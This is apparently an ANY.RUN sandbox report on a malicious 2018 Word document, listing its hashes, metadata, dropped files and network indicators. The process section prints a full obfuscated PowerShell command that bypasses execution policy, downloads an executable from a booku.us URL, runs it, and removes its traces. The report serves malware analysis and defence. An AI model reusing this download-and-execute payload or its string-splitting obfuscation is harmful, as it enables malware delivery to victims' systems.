analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

4b8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375

Full analysis: https://app.any.run/tasks/31d494d6-1138-449b-8c61-36ecad92504a
Verdict: Malicious activity
Analysis date: November 14, 2018, 18:37:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Yvette Rosselat, Number of Characters: 478618, Create Time/Date: Mon Nov 12 04:43:19 2018, Last Saved Time/Date: Mon Nov 12 04:43:19 2018, Security: 0, Keywords: officia, rerum, hic, Last Saved By: Yvette Rosselat, Revision Number: 825055, Subject: Remise N876104635, Template: Normal, Title: Remise N876104635, Total Editing Time: 03:00, Number of Words: 68374, Number of Pages: 45, Comments: Temporibus id amet at sapiente similique.
MD5:

4A0952E2A3CDE7A88D15671227ED59AB

SHA1:

FC3EA5F5F01D4CF5C59B2FA0283C9098F058FA2C

SHA256:

4B8615FD5CC0220037E41F208C14E7D2499D6FF18C984807FD054D39DA352375

SSDEEP:

6144:8A0GWb52ZWSfnugIzJpCBG/Ao9ekhpTwkHm:8A0GWb5DSfiJx0oDHm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 2700)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2700)

    • Application was dropped or rewritten from another process

      • uhpgyr.exe (PID: 2104)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • uhpgyr.exe (PID: 2104)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2700)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2700)

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 2700)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (33.9)

EXIF

FlashPix

CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
Software: Microsoft Office Word
Author: Yvette Rosselat
Characters: 478618
CreateDate: 2018:11:12 04:43:19
ModifyDate: 2018:11:12 04:43:19
Security: None
Keywords: officia, rerum, hic
LastModifiedBy: Yvette Rosselat
RevisionNumber: 825055
Subject: Remise N876104635
Template: Normal
Title: Remise N876104635
TotalEditTime: 3.0 minutes
Words: 68374
Pages: 45
Comments: Temporibus id amet at sapiente similique.
Paragraphs: 181
Bytes: -2147483648
HiddenSlides: -2147483648
Lines: 2974
Notes: -2147483648
Slides: -2147483648
Company: Aeby Sàrl.
Manager: Denise Sansonnens
Category: sit
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
33
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe uhpgyr.exe

Process information

PID
CMD
Path
Indicators
Parent process
2700"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4b8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2104C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe $chxgjuiy='iyjflpdx.';$xjmxaf=' Pro';$lyepvac='nPol';$miiecld='exe'')';$iljgju='$hj = ''hw';$nxcswau='se -force';$udsy='e-';$ivxyoe='yste';$vyxfo='-Object S';$fagpnwa='m.Net.W';$ccxou='h); Start';$yzmva='dFile(''';$uclekne='icy By';$uuvn='https:/';$rxsjoe0='ooku.us/w';$enro5='env:';$evcyxzcc='ope';$bcun='Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ezpbjfu='temp + ''\';$iey=') -recur';$wpebnbxy1='ss -Sc';$omxfuoa='cess; $p';$xemxu='hfhj'';';$bdfdea='ath;Remov';$uuyuw='ss $p';$iwknjz1='uyvqsd';$eggjnq='ath=($env';$uueou15='lc.';$uiu='p-content';$nhfjwlcxs0='.Downl';$oljkdaht='ebclient)';$xpeiija='Executio';$immcpyin='/images';$eeblv=';(New';$ehqzt05='ecg''';$elplpda='/theme';$kpei='oa';$hdueo='belleza';$dlmcu=';';$fdve='-Proce';$wruqogv9='s/';$wjeegr='/b';$glpe=':temp+''\s';$jdiyh='exe'',$pat';$ibqeu='Set-';$aiygyo='/f';$ouuain='pa'; Invoke-Expression ($iljgju+$xemxu+$ibqeu+$xpeiija+$lyepvac+$uclekne+$ouuain+$wpebnbxy1+$evcyxzcc+$xjmxaf+$omxfuoa+$eggjnq+$glpe+$chxgjuiy+$miiecld+$eeblv+$vyxfo+$ivxyoe+$fagpnwa+$oljkdaht+$nhfjwlcxs0+$kpei+$yzmva+$uuvn+$wjeegr+$rxsjoe0+$uiu+$elplpda+$wruqogv9+$hdueo+$immcpyin+$aiygyo+$uueou15+$jdiyh+$ccxou+$fdve+$uuyuw+$bdfdea+$udsy+$bcun+$enro5+$ezpbjfu+$iwknjz1+$ehqzt05+$iey+$nxcswau+$dlmcu);C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 608
Read events
1 198
Write events
0
Delete events
0

Modification events

No data
Executable files
14
Suspicious files
1
Text files
121
Unknown types
2

Dropped files

PID
Process
Filename
Type
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAC0A.tmp.cvr
MD5:
SHA256:
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
2700WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:256A3EF47ED32A3D3038855D49DF0319
SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375.docpgc
MD5:85B9009F448F67ACC7A5FD66EC672D21
SHA256:4A911D98179D45EBABEA0F2A35EA5A326AD8ACF99087F802084A6589633DECA7
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_Break.help.txttext
MD5:AEDBFC39660AE3E030761ED4782CE328
SHA256:13231768182599EC2C15B281F5E313E36428327479DA7F05FF8A92C5479214F2
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_arrays.help.txttext
MD5:04BB4AA2CF5A5D3EAD1D9F6EEA89C034
SHA256:0C058DF25203E39D339F127C0AE8235EE3E2E77F33B57F894E8E5A4AE6243EC8
2700WINWORD.EXEC:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_Command_Syntax.help.txttext
MD5:847B0C3A6010660492ECC1D88A69210D
SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
uhpgyr.exe
31.186.83.114:443
booku.us
ATM S.A.
PL
unknown

DNS requests

Domain
IP
Reputation
booku.us
  • 31.186.83.114
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
4b8615fd5cc0220037e41f208c14e7d2499d6ff18c984807fd054d39da352375